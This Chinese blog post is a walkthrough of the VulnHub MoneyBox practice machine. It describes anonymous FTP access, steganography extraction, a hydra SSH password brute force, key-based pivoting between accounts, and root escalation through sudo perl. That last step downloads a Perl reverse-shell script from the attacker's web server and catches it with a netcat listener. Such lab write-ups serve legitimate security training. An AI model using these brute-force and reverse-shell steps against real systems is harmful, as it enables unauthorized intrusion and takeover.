透测试靶机vulnhub——MoneyBox

信息收集

  1. 主机探测:首先,我们需要确定靶机的IP地址

批注 2023-10-13 085632

  1. 靶机所有开放的端口对应服务版本号

  2. FTP匿名登录:发现21端口可以无验证登录,使用ftp进行匿名登录。

    批注 2023-10-13 085706

    登录成功后,发现有一个名为trytofind的图片,下载下来进行分析。

    1. 先用kali自带的strings工具查看一下该图片中的可打印字符。

    批注 2023-10-13 085739

  3. 虽然查到了图片中的文件,但是查看文件需要密码,ftp这条线索到此就断了。

    img

    1. 就去看看80端口好了,打开浏览器访问。

      80端口的网站主页也没什么有用的信息,查看网页源代码也没发现

      批注 2023-10-13 085831

      批注 2023-10-13 085839

  4. 进入80端口看一下,即使查看源码也没有任何提示。然后进行目录扫描,可以使用dirb进行目录扫描。

    批注 2023-10-13 085800

扫描结果显示/blogs/index.html下有内容。

批注 2023-10-13 085850

批注 2023-10-13 085940

  1. 隐藏目录访问:在源码中的最后一行,提示我们去访问另一个隐藏目录S3cr3t-T3xt。访问该目录后,找到了一个密钥3xtr4ctd4t4。

  2. 批注 2023-10-13 090036

    批注 2023-10-13 090028

找到密钥3xtr4ctd4t4,重新回到查看图片隐写处,输入密钥。

批注 2023-10-13 090428

cat查看图片中隐藏的data.txt,这是一封信件的格式,是告诉renu说他的密码太过于简单了,我们结合ssh端口。把用户名定位renu,用hydra爆破,这里爆破用的密码字典是kali自带的。

批注 2023-10-13 090625

批注 2023-10-13 091421

爆破得到密码:987654321,通过ssh连接。

批注 2023-10-13 091537

得到第一个flag。

历史命令里有把密钥发送给192.168.43.80的lily账号。

批注 2023-10-13 091708

又在/home/lily/发现了第二个flag

批注 2023-10-13 091802

前面猜测是生成的密钥发送给了本地的lily账户,如果是这样的话就能不用账号密码,用密钥就能够登录lily账户,为了验证这个猜想,执行ssh lily@127.0.0.1

批注 2023-10-13 093016

image-20231015160749533

执行sudo -l发现该用户存在sudo赋权,程序为/usr/bin/perl,perl同python类似,也是一门解释型语言,推测靶机应该有perl运行环境。

定位kali中的perl脚本反弹shell,将其拷贝到kali的/var/www/html下,重命名为p.php;

批注 2023-10-13 092626

修改p.php文件内容,将反弹连接的Ip地址改为kali的IP;

批注 2023-10-13 092348

开启kali的网站服务;

systemctl start apache2

切换到靶机lily会话,通过http协议下载p.php

lily wget

kali 通过nc命令监听1234端口

nc -lnvp 1234

靶机上通过sudo 运行p.php程序

image-20231015161343485

切换到渗透机kali,成功反弹管理员权限shell

批注 2023-10-13 093358

批注 2023-10-13 093411

渗透总结:

  • 信息收集获取ip地址 和端口信息
  • FTP匿名登入 隐写工具得使用steghide
  • hydra得使用暴力破解
  • 利用perl进行提权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值